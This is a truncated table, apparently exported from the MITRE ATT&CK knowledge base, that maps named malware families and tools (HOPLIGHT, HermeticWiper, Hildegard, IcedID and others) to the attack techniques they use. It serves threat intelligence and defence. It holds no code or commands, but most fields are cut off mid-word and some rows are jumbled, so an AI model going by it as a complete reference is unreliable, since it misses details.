S0037 HAMMERTmalware-- software uses T1564.003Hidden Wi attack-pat technique [HAMMERTOS
S0037 HAMMERTmalware-- software uses T1102.003One-Way Cattack-pat technique The "tDisco
S0037 HAMMERTmalware-- software uses T1059.001PowerShellattack-pat technique [HAMMERTOS
S0037 HAMMERTmalware-- software uses T1001.002Steganogr attack-pat technique [HAMMERTOS
S0037 HAMMERTmalware-- software uses T1573.001Symmetric attack-pat technique Before bei
S0037 HAMMERTmalware-- software uses T1071.001Web Protocattack-pat technique The "Uploa
S0214 HAPPYWORmalware--2software uses T1105 Ingress Tooattack-pat technique can downlo
S0214 HAPPYWORmalware--2software uses T1082 System Inf attack-pat technique can collec
S0214 HAPPYWORmalware--2software uses T1033 System Own attack-pat technique can collect
S0246 HARDRAINmalware-- software uses T1562.004Disable or attack-pat technique [HARDRAIN]
S0246 HARDRAINmalware-- software uses T1571 Non-Standaattack-pat technique [HARDRAIN]
S0246 HARDRAINmalware-- software uses T1001.003Protocol o attack-pat technique [HARDRAIN]
S0246 HARDRAINmalware-- software uses T1090 Proxy attack-pat technique [HARDRAIN]
S0246 HARDRAINmalware-- software uses T1059.003Windows Cattack-pat technique [HARDRAIN]
S0391 HAWKBALLmalware-- software uses T1560.003Archive vi attack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1559.002Dynamic Daattack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1027.013Encrypted/attack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1041 Exfiltratio attack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1203 Exploitatioattack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1070.004File Deleti attack-pat technique [HAWKBALL](
S0391 HAWKBALLmalware-- software uses T1106 Native API attack-pat technique [HAWKBALL](
S0391 HAWKBALLmalware-- software uses T1082 System Inf attack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1033 System Own attack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1071.001Web Protocattack-pat technique [HAWKBALL]
S0391 HAWKBALLmalware-- software uses T1059.003Windows Cattack-pat technique [HAWKBALL]
S0061 HDoor malware-- software uses T1562.001Disable or attack-pat technique [HDoor](htt
S0061 HDoor malware-- software uses T1046 Network Seattack-pat technique [HDoor](htt
S0617 HELLOKITTmalware-- software uses T1486 Data Encryattack-pat technique [HELLOKITT
S0617 HELLOKITTmalware-- software uses T1490 Inhibit Sy attack-pat technique [HELLOKITT
S0617 HELLOKITTmalware-- software uses T1135 Network Shattack-pat technique [HELLOKITTY
S0617 HELLOKITTmalware-- software uses T1057 Process Di attack-pat technique [HELLOKITTY
S0617 HELLOKITTmalware-- software uses T1082 System Inf attack-pat technique [HELLOKITTY
S0617 HELLOKITTmalware-- software uses T1047 Windows M attack-pat technique [HELLOKITT
S0135 HIDEDRV malware--esoftware uses T1055.001Dynamic-linattack-pat technique [HIDEDRV](h
S0135 HIDEDRV malware--esoftware uses T1014 Rootkit attack-pat technique [HIDEDRV](h
S0232 HOMEFRY malware-- software uses T1027.013Encrypted/attack-pat technique Some strin
S0232 HOMEFRY malware-- software uses T1003 OS Credentattack-pat technique [HOMEFRY](
S0232 HOMEFRY malware-- software uses T1059.003Windows Cattack-pat technique [HOMEFRY](
S0376 HOPLIGHT malware-- software uses T1652 Device Drivattack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1562.004Disable or attack-pat technique [HOPLIGHT](
S0376 HOPLIGHT malware-- software uses T1041 Exfiltratio attack-pat technique [HOPLIGHT](
S0376 HOPLIGHT malware-- software uses T1008 Fallback C attack-pat technique [HOPLIGHT](
S0376 HOPLIGHT malware-- software uses T1083 File and Di attack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1105 Ingress Tooattack-pat technique [HOPLIGHT](
S0376 HOPLIGHT malware-- software uses T1112 Modify Regattack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1571 Non-Standaattack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1550.002Pass the H attack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1055 Process Injattack-pat technique [HOPLIGHT]
[HOPLIGHT](https://attack.m
S0376 HOPLIGHT malware-- software uses T1090 Proxy attack-pat technique
S0376 HOPLIGHT malware-- software uses T1012 Query Regiattack-pat technique A variant
S0376 HOPLIGHT malware-- software uses T1003.002Security A attack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1569.002Service Ex attack-pat technique [HOPLIGHT]
[HOPLIGHT](https://attack.m
S0376 HOPLIGHT malware-- software uses T1132.001Standard Eattack-pat technique
S0376 HOPLIGHT malware-- software uses T1082 System Inf attack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1124 System Timattack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1059.003Windows Cattack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1047 Windows M attack-pat technique [HOPLIGHT]
S0376 HOPLIGHT malware-- software uses T1546.003Windows Ma attack-pat technique [HOPLIGHT]
S0040 HTRAN tool--d5e software uses T1055 Process Injattack-pat technique [HTRAN](htt
S0040 HTRAN tool--d5e software uses T1090 Proxy attack-pat technique [HTRAN](ht
S0040 HTRAN tool--d5e software uses T1014 Rootkit attack-pat technique [HTRAN](htt
S0070 HTTPBrowsmalware-- software uses T1574.001DLL Searchattack-pat technique [HTTPBrowse
S0070 HTTPBrowsmalware-- software uses T1574.002DLL Side-L attack-pat technique [HTTPBrowse
S0070 HTTPBrowsmalware-- software uses T1071.004DNS attack-pat technique [HTTPBrows
S0070 HTTPBrowsmalware-- software uses T1070.004File Deleti attack-pat technique [HTTPBrowse
S0070 HTTPBrowsmalware-- software uses T1083 File and Di attack-pat technique [HTTPBrowse
S0070 HTTPBrowsmalware-- software uses T1105 Ingress Tooattack-pat technique [HTTPBrowse
S0070 HTTPBrowsmalware-- software uses T1056.001Keyloggingattack-pat technique [HTTPBrowse
S0070 HTTPBrowsmalware-- software uses T1036.005Match Legiattack-pat technique [HTTPBrowse
S0070 HTTPBrowsmalware-- software uses T1027 Obfuscatedattack-pat technique [HTTPBrows
S0070 HTTPBrowsmalware-- software uses T1547.001Registry Ruattack-pat technique [HTTPBrows
S0070 HTTPBrowsmalware-- software uses T1071.001Web Protocattack-pat technique [HTTPBrows
S0070 HTTPBrowsmalware-- software uses T1059.003Windows Cattack-pat technique [HTTPBrowse
S1097 HUI Loadermalware-- software uses T1574.001DLL Searchattack-pat technique [HUI Loade
S1097 HUI Loadermalware-- software uses T1140 Deobfuscatattack-pat technique [HUI Loade
S1097 HUI Loadermalware-- software uses T1562.006Indicator Battack-pat technique [HUI Loade
S0047 Hacking Temalware-- software uses T1014 Rootkit attack-pat technique [Hacking T
S0047 Hacking Temalware-- software uses T1542.001System Fi attack-pat technique [Hacking T
S0499 Hancitor malware-- software uses T1140 Deobfuscatattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1070.004File Deleti attack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1105 Ingress Tooattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1204.002Malicious Fattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1204.001Malicious Lattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1106 Native API attack-pat technique [Hancitor]
S0499 Hancitor malware-- software uses T1027 Obfuscatedattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1059.001PowerShellattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1547.001Registry Ruattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1566.001Spearphishattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1566.002Spearphishattack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1218.012Verclsid attack-pat technique [Hancitor](
S0499 Hancitor malware-- software uses T1497 Virtualiza attack-pat technique [Hancitor](
S0224 Havij tool--fbd7 software uses T1190 Exploit Pubattack-pat technique [Havij](htt
S0170 Helminth malware--esoftware uses T1119 Automatedattack-pat technique A [Helminth
S0170 Helminth malware--esoftware uses T1115 Clipboard attack-pat technique The executa
S0170 Helminth malware--esoftware uses T1553.002Code Signi attack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1071.004DNS attack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1030 Data Transfattack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1069.002Domain Grattack-pat technique [Helminth]
S0170 Helminth malware--esoftware uses T1027.013Encrypted/attack-pat technique The [Helmin
S0170 Helminth malware--esoftware uses T1105 Ingress Tooattack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1056.001Keyloggingattack-pat technique The executa
S0170 Helminth malware--esoftware uses T1074.001Local Data attack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1069.001Local Grouattack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1059.001PowerShellattack-pat technique One version
S0170 Helminth malware--esoftware uses T1057 Process Di attack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1547.001Registry Ruattack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1053.005Scheduled attack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1547.009Shortcut Mattack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1132.001Standard Eattack-pat technique For C2 over
S0170 Helminth malware--esoftware uses T1573.001Symmetric attack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1059.005Visual Basiattack-pat technique One version
S0170 Helminth malware--esoftware uses T1071.001Web Protocattack-pat technique [Helminth](
S0170 Helminth malware--esoftware uses T1059.003Windows Cattack-pat technique [Helminth](
S0697 HermeticWmalware-- software uses T1134 Access Tokattack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1070.001Clear Windattack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1553.002Code Signi attack-pat technique The [Hermet
S0697 HermeticWmalware-- software uses T1485 Data Destrattack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1140 Deobfuscatattack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1561.001Disk Conteattack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1561.002Disk Struc attack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1027.013Encrypted/attack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1070.004File Deleti attack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1083 File and Di attack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1484.001Group Poliattack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1562.006Indicator Battack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1070 Indicator attack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1490 Inhibit Sy attack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1036.005Match Legiattack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1112 Modify Regattack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1106 Native API attack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1053.005Scheduled attack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1569.002Service Ex attack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1489 Service Stoattack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1082 System Inf attack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1529 System Sh attack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1497.003Time Basedattack-pat technique [HermeticWi
S0697 HermeticWmalware-- software uses T1059.003Windows Cattack-pat technique [HermeticW
S0697 HermeticWmalware-- software uses T1543.003Windows Se attack-pat technique [HermeticWi
S0698 HermeticWmalware--fsoftware uses T1070.001Clear Windattack-pat technique [HermeticWi
S0698 HermeticWmalware--fsoftware uses T1553.002Code Signi attack-pat technique [HermeticWi
S0698 HermeticWmalware--fsoftware uses T1559.001Componentattack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1027.013Encrypted/attack-pat technique [HermeticWi
S0698 HermeticWmalware--fsoftware uses T1570 Lateral Tooattack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1036.005Match Legiattack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1106 Native API attack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1046 Network Seattack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1110.001Password Gattack-pat technique [HermeticWi
S0698 HermeticWmalware--fsoftware uses T1218.010Regsvr32 attack-pat technique [HermeticWi
S0698 HermeticWmalware--fsoftware uses T1018 Remote Sysattack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1218.011Rundll32 attack-pat technique [HermeticWi
S0698 HermeticWmalware--fsoftware uses T1021.002SMB/Windo attack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1569.002Service Ex attack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1059.003Windows Cattack-pat technique [HermeticW
S0698 HermeticWmalware--fsoftware uses T1047 Windows M attack-pat technique [HermeticW
S1027 Heyoka Bamalware--dsoftware uses T1071.004DNS attack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1140 Deobfuscatattack-pat technique [Heyoka Bac
S1027 Heyoka Bamalware--dsoftware uses T1055.001Dynamic-linattack-pat technique [Heyoka Bac
S1027 Heyoka Bamalware--dsoftware uses T1027.013Encrypted/attack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1070.004File Deleti attack-pat technique [Heyoka Bac
S1027 Heyoka Bamalware--dsoftware uses T1083 File and Di attack-pat technique [Heyoka Bac
S1027 Heyoka Bamalware--dsoftware uses T1204.002Malicious Fattack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1036.004Masquerade attack-pat technique [Heyoka Bac
S1027 Heyoka Bamalware--dsoftware uses T1120 Peripheral attack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1057 Process Di attack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1572 Protocol T attack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1547.001Registry Ruattack-pat technique [Heyoka Bac
S1027 Heyoka Bamalware--dsoftware uses T1218.011Rundll32 attack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1082 System Inf attack-pat technique [Heyoka Ba
S1027 Heyoka Bamalware--dsoftware uses T1007 System Serattack-pat technique [Heyoka Bac
S0087 Hi-Zor malware--5software uses T1573.002Asymmetricattack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1027.013Encrypted/attack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1070.004File Deleti attack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1105 Ingress Tooattack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1547.001Registry Ruattack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1218.010Regsvr32 attack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1573.001Symmetric attack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1071.001Web Protocattack-pat technique [Hi-Zor](ht
S0087 Hi-Zor malware--5software uses T1059.003Windows Cattack-pat technique [Hi-Zor](ht
S0394 HiddenWasmalware-- software uses T1140 Deobfuscatattack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1574.006Dynamic Liattack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1027.013Encrypted/attack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1105 Ingress Tooattack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1136.001Local Acco attack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1095 Non-Applicattack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1037.004RC Scripts attack-pat technique [HiddenWasp
S0394 HiddenWasmalware-- software uses T1014 Rootkit attack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1573.001Symmetric attack-pat technique [HiddenWas
S0394 HiddenWasmalware-- software uses T1059.003Windows Cattack-pat technique [HiddenWasp
S0009 Hikit malware-- software uses T1553.006Code Signinattack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1574.001DLL Searchattack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1005 Data from attack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1105 Ingress Tooattack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1553.004Install Rootattack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1090.001Internal Prattack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1566 Phishing attack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1014 Rootkit attack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1573.001Symmetric attack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1071.001Web Protocattack-pat technique [Hikit](htt
S0009 Hikit malware-- software uses T1059.003Windows Cattack-pat technique [Hikit](htt
S0601 Hildegard malware-- software uses T1071 Applicationattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1070.003Clear Comm attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1552.005Cloud Inst attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1496.001Compute Hiattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1609 Container attack-pat technique [Hildegard
S0601 Hildegard malware-- software uses T1613 Container attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1552.001Credentialsattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1140 Deobfuscatattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1562.001Disable or attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1574.006Dynamic Liattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1027.013Encrypted/attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1611 Escape to attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1068 Exploitatioattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1133 External R attack-pat technique [Hildegard
S0601 Hildegard malware-- software uses T1070.004File Deleti attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1105 Ingress Tooattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1136.001Local Acco attack-pat technique [Hildegard
S0601 Hildegard malware-- software uses T1036.004Masquerade attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1046 Network Seattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1552.004Private Keyattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1219 Remote Accattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1014 Rootkit attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1027.002Software Pattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1082 System Inf attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1543.002Systemd Seattack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1059.004Unix Shell attack-pat technique [Hildegard]
S0601 Hildegard malware-- software uses T1102 Web Servicattack-pat technique [Hildegard]
S0431 HotCroissamalware-- software uses T1010 Applicatio attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1027.013Encrypted/attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1041 Exfiltratio attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1070.004File Deleti attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1083 File and Di attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1564.003Hidden Wi attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1105 Ingress Tooattack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1106 Native API attack-pat technique [HotCroiss
S0431 HotCroissamalware-- software uses T1057 Process Di attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1053.005Scheduled attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1113 Screen Capattack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1489 Service Stoattack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1518 Software Dattack-pat technique [HotCroiss
S0431 HotCroissamalware-- software uses T1027.002Software Pattack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1573.001Symmetric attack-pat technique [HotCroiss
S0431 HotCroissamalware-- software uses T1082 System Inf attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1016 System Netattack-pat technique [HotCroiss
S0431 HotCroissamalware-- software uses T1033 System Own attack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1007 System Serattack-pat technique [HotCroissa
S0431 HotCroissamalware-- software uses T1059.003Windows Cattack-pat technique [HotCroiss
S0203 Hydraq malware-- software uses T1134 Access Tokattack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1070.001Clear Windattack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1005 Data from attack-pat technique [Hydraq](h
S0203 Hydraq malware-- software uses T1048 Exfiltratio attack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1070.004File Deleti attack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1083 File and Di attack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1105 Ingress Tooattack-pat technique [Hydraq](h
S0203 Hydraq malware-- software uses T1112 Modify Regattack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1027 Obfuscatedattack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1057 Process Di attack-pat technique [Hydraq](h
S0203 Hydraq malware-- software uses T1012 Query Regiattack-pat technique [Hydraq](h
S0203 Hydraq malware-- software uses T1113 Screen Capattack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1569.002Service Ex attack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1129 Shared Moattack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1573.001Symmetric attack-pat technique [Hydraq](ht
S0203 Hydraq malware-- software uses T1082 System Inf attack-pat technique [Hydraq](h
S0203 Hydraq malware-- software uses T1016 System Netattack-pat technique [Hydraq](h
S0203 Hydraq malware-- software uses T1007 System Serattack-pat technique [Hydraq](h
S0203 Hydraq malware-- software uses T1543.003Windows Se attack-pat technique [Hydraq](ht
S0398 HyperBro malware-- software uses T1574.002DLL Side-L attack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1140 Deobfuscatattack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1027.013Encrypted/attack-pat technique [HyperBro]
S0398 HyperBro malware-- software uses T1070.004File Deleti attack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1105 Ingress Tooattack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1106 Native API attack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1055 Process Injattack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1113 Screen Capattack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1569.002Service Ex attack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1027.002Software Pattack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1007 System Serattack-pat technique [HyperBro](
S0398 HyperBro malware-- software uses T1071.001Web Protocattack-pat technique [HyperBro]
S0537 HyperStackmalware--2software uses T1078.001Default Ac attack-pat technique [HyperStack
S0537 HyperStackmalware--2software uses T1559 Inter-Proc attack-pat technique [HyperStac
S0537 HyperStackmalware--2software uses T1087.001Local Acco attack-pat technique [HyperStac
S0537 HyperStackmalware--2software uses T1112 Modify Regattack-pat technique [HyperStac
S0537 HyperStackmalware--2software uses T1106 Native API attack-pat technique [HyperStac
S0537 HyperStackmalware--2software uses T1573.001Symmetric attack-pat technique [HyperStac
S1152 IMAPLoademalware--3software uses T1574.014AppDomaiattack-pat technique [IMAPLoade
S1152 IMAPLoademalware--3software uses T1543 Create or attack-pat technique [IMAPLoader
S1152 IMAPLoademalware--3software uses T1564.003Hidden Wi attack-pat technique [IMAPLoade
S1152 IMAPLoademalware--3software uses T1105 Ingress Tooattack-pat technique [IMAPLoader
S1152 IMAPLoademalware--3software uses T1071.003Mail Protocattack-pat technique [IMAPLoade
S1152 IMAPLoademalware--3software uses T1106 Native API attack-pat technique [IMAPLoade
S1152 IMAPLoademalware--3software uses T1053.005Scheduled attack-pat technique [IMAPLoader
S1152 IMAPLoademalware--3software uses T1082 System Inf attack-pat technique [IMAPLoade
S1152 IMAPLoademalware--3software uses T1047 Windows M attack-pat technique [IMAPLoade
S1139 INC Ranso malware-- software uses T1486 Data Encryattack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1140 Deobfuscatattack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1652 Device Drivattack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1083 File and Di attack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1490 Inhibit Sy attack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1491.001Internal D attack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1570 Lateral Tooattack-pat technique [INC Ransomware](https://att
S1139 INC Ranso malware-- software uses T1106 Native API attack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1135 Network Shattack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1120 Peripheral attack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1566 Phishing attack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1057 Process Di attack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1489 Service Stoattack-pat technique [INC Ranso
S1139 INC Ranso malware-- software uses T1082 System Inf attack-pat technique [INC
[INC Ranso
Ransomware](https://att
S1139 INC Ranso malware-- software uses T1047 Windows M attack-pat technique
S1132 IPsec Help malware-- software uses T1070.009Clear Persiattack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1005 Data from attack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1027.013Encrypted/attack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1041 Exfiltratio attack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1070.004File Deleti attack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1070 Indicator attack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1570 Lateral Tooattack-pat technique [IPsec Hel
S1132 IPsec Help malware-- software uses T1112 Modify Regattack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1059.001PowerShellattack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1057 Process Di attack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1569.002Service Ex attack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1497.003Time Basedattack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1059.005Visual Basiattack-pat technique [IPsec Help
S1132 IPsec Help malware-- software uses T1071.001Web Protocattack-pat technique [IPsec Hel
S1132 IPsec Help malware-- software uses T1059.003Windows Cattack-pat technique [IPsec Hel
S0189 ISMInjectomalware-- software uses T1140 Deobfuscatattack-pat technique [ISMInjecto
S0189 ISMInjectomalware-- software uses T1027 Obfuscatedattack-pat technique [ISMInjecto
S0189 ISMInjectomalware-- software uses T1055.012Process Hoattack-pat technique [ISMInjecto
S0189 ISMInjectomalware-- software uses T1053.005Scheduled attack-pat technique [ISMInjecto
S1022 IceApple malware-- software uses T1560.001Archive viaattack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1027.010Command aOttack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1552.002Credentialsattack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1005 Data from attack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1140 Deobfuscatattack-pat technique [IceApple]
S1022 IceApple malware-- software uses T1087.002Domain Acattack-pat technique The [IceApp
S1022 IceApple malware-- software uses T1041 Exfiltratio attack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1070.004File Deleti attack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1083 File and Di attack-pat technique The [IceApp
S1022 IceApple malware-- software uses T1505.004IIS Componattack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1003.004LSA Secret attack-pat technique [IceApple]
S1022 IceApple malware-- software uses T1036.005Match Legiattack-pat technique [IceApple](
S1022 IceApple malware-- software uses T1620 Reflective attack-pat technique [IceApple]
S1022 IceApple malware-- software uses T1003.002Security A attack-pat technique [IceApple]
S1022 IceApple malware-- software uses T1573.001Symmetric attack-pat technique The [IceAp
S1022 IceApple malware-- software uses T1082 System Inf attack-pat technique The [IceApp
S1022 IceApple malware-- software uses T1016 System Netattack-pat technique The [IceApp
S1022 IceApple malware-- software uses T1056.003Web Portalattack-pat technique The [IceAp
S1022 IceApple malware-- software uses T1071.001Web Protocattack-pat technique [IceApple](
S0483 IcedID malware-- software uses T1573.002Asymmetricattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1055.004Asynchronoattack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1185 Browser Seattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1087.002Domain Acattack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1482 Domain Truattack-pat technique [IcedID](h
